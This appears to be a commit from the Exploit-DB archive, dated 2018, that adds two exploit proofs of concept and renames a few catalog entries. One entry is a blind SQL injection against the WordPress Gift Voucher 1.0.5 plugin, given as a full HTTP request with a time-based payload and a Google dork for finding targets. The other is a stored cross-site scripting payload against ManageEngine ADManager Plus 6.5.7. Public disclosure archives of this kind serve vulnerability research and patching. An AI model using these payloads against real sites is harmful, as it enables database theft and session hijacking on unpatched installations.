DB: 2018-08-27

2 changes to exploits/shellcodes Apache James 2.2 - SMTP Denial of Service Apache James Server 2.2 - SMTP Denial of Service SSH2 3.0 - Restricted Shell Escaping Command Execution SSH2 3.0 - Restricted Shell Escape (Command Execution) WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
2018-08-27 05:01:54 +00:00 · 2018-08-27 05:01:54 +00:00 · aaa959b29c
commit aaa959b29c
parent ec10fd3afb
3 changed files with 92 additions and 2 deletions
--- a/exploits/php/webapps/45255.txt
+++ b/exploits/php/webapps/45255.txt
@ -0,0 +1,38 @@
+# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
+# Google Dork: intext:"/wp-content/plugins/gift-voucher/"
+# Date: 2018-08-23
+# Exploit Author: Renos Nikolaou
+# Software Link: https://wordpress.org/plugins/gift-voucher/
+# Vendor Homepage: http://www.codemenschen.at/
+# Version: 1.0.5
+# Tested on: Windows 10
+# CVE: N/A
+# Description : The vulnerability allows an attacker to inject sql commands 
+# on 'template_id' parameter.
+
+# PoC - Blind SQLi :
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: domain.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://domain.com/gift-voucher/
+Content-Length: 62
+Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
+Connection: close
+
+action=wpgv_doajax_front_template&template_id=1 and sleep(15)#
+
+Parameter: template_id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
+    Vector: AND [INFERENCE]
+---
+web application technology: Apache
+back-end DBMS: MySQL >= 5.0.0
+banner:    '5.5.59'
--- a/exploits/windows_x86-64/webapps/45256.txt
+++ b/exploits/windows_x86-64/webapps/45256.txt
@ -0,0 +1,50 @@
+# Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
+# Date: 2018-08-21 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.manageengine.com/
+# Hardware Link : https://www.manageengine.com/products/ad-manager/
+# Software : ZOHO Corp ManageEngine ADManager Plus
+# Product Version:  6.5.7
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+
+# Zoho ManageEngine ADManager Plus 6.5.7 allows XSS on the "Workflow Delegation" "Requesters" screen.
+
+# HTTP Request Header :
+
+Request URL: http://TARGET:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
+Request Method: POST
+Status Code: 200 OK
+Remote Address: TARGET:8080
+Referrer Policy: no-referrer-when-downgrade
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Length: 320
+Content-type: application/x-www-form-urlencoded;charset=UTF-8
+Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=3CED862790101335DD0EB05EE42E4972; JSESSIONIDSSO=3E6785DB8D6DFD46D6C729579E68418D
+Host: TARGET:8080
+Origin: http://TARGET:8080
+Referer: http://TARGET:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
+X-Requested-With: XMLHttpRequest
+
+# HTTP Response Header :
+
+Content-Length: 3753
+Content-Type: text/html;charset=UTF-8
+Date: Tue, 14 Aug 2018 10:14:32 GMT
+Server: Apache-Coyote/1.1
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1
+
+# Query String Parameters :
+
+methodToCall: listTechnicianRows
+
+# Form Data :
+
+params: {"startIndex":1,"range":10,"searchText":"\"><img src=x onerror=alert('TESTER')>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
+adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3569,7 +3569,7 @@ id,file,description,date,author,type,platform,port
 27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,dos,linux,
 27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",dos,windows,
 27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow",2006-05-29,kcope,dos,windows,
-27915,exploits/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple,
+27915,exploits/multiple/dos/27915.pl,"Apache James Server 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple,
 27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",dos,linux,
 27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)",2006-05-31,Mr.Niega,dos,windows,
 27942,exploits/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",dos,hardware,
@ -8286,7 +8286,7 @@ id,file,description,date,author,type,platform,port
 21362,exploits/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",local,linux,
 21373,exploits/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",local,openbsd,
 21375,exploits/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",local,linux,
-21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,local,linux,
+21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escape (Command Execution)",2002-04-18,A.Dimitrov,local,linux,
 21407,exploits/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,local,bsd,
 21408,exploits/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,local,unix,
 21414,exploits/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Local Buffer Overflow",2002-04-23,"Gobbles Security",local,unix,
@ -39856,3 +39856,5 @@ id,file,description,date,author,type,platform,port
 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
 45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
 45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,
+45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,
+45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,